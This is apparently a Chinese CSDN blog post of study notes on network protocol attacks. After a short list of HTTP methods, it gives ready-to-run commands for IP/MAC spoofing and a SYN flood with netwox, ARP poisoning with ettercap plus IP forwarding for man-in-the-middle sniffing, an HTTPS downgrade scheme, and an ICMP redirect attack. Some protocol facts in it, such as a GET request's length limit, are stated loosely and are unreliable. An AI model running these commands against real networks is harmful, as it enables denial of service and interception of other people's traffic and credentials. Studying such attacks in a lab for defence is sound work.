协议攻击(一)

协议攻击

一.什么是协议

网络协议是通信计算机双方必须共同遵从的一组约定。

什么是安全?

违背开发者建设者使用者意愿的都可以称之为安全隐患

ISO是一个标准组织

二.HTTP请求有八种请求

  • GET请求:最长300多位
  • HEAD请求:跟GET请求一样,不过只会返回请求头,不会返回请求体
  • POST请求:是用表单提交,
  • PUT请求:向指定资源位置上传其最新内容。
  • DELETE请求:请求删除Request-URI所标识的资源
  • TRACE请求:回显服务器收到的请求,主要用于测试或诊断
  • OPTIONS请求:这个方法可以看服务器支持哪些HTTP的请求方式
  • CONNECT请求:是HTTP/1.1 差不多就是保留的请求方式,生产上用的特别少

三.伪造IP攻击命令

netwox 52 -E "0:1:2:3:4:5" -I "192.168.100.125" -e "00:0c:29:83:36:d7" -i "192.168.100.151"

netwox是工具 52是伪造IP攻击方式 MAC是伪造后的MAC 伪造的IP地址 伪造的MAC地址 目标IP地址

netwox 76 -i 192.168.100.151 -p 80

76 是syn泛洪且发送一次tcp连接请求,就改一次源IP 选择ip和端口就可以了

netstat -antu|grep :80

查看80端口连接的状态

tcpdump –i eth0 tcp port 80 -n –nn

查看eth0网卡的80端口的数据包

四.ARP欺诈

ARP欺诈就是利用ARP广播寻找IP的方式来进行欺诈

一直保持这种欺诈关系就要利用ARP毒化,受害者发送一次,攻击者发送一百次,受害者一发送就被覆盖了

ettercap -i eth0 -Tq -M arp:remote /192.168.100.142// /192.168.100.1//

选择ettercap工具 选择网卡 +目标主机IP +网关IP

开启kali转发功能

echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward

开启监听本地网卡

ettercap -Tq -i eth0

如果目标访问的是https的网站,可以利用中间人降为攻击,

有两种方式,一种是左右两方都是https协议你跟服务器端做加解密

第二种是中间人和受害者是http协议,中间人和服务器端是https的

五.ICMP重定向攻击

echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects
echo 1 > /proc/sys/net/ipv4/conf/eth0/accept_redirects
echo 1 > /proc/sys/net/ipv4/conf/default/accept_redirects

以上三个全置为一

netwox 86 -g 192.168.100.148 -i 192.168.100.2

工具名 攻击编号 选择 自己的IP 选择 网关

相关推荐
©️2020 CSDN 皮肤主题: 1024 设计师:白松林 返回首页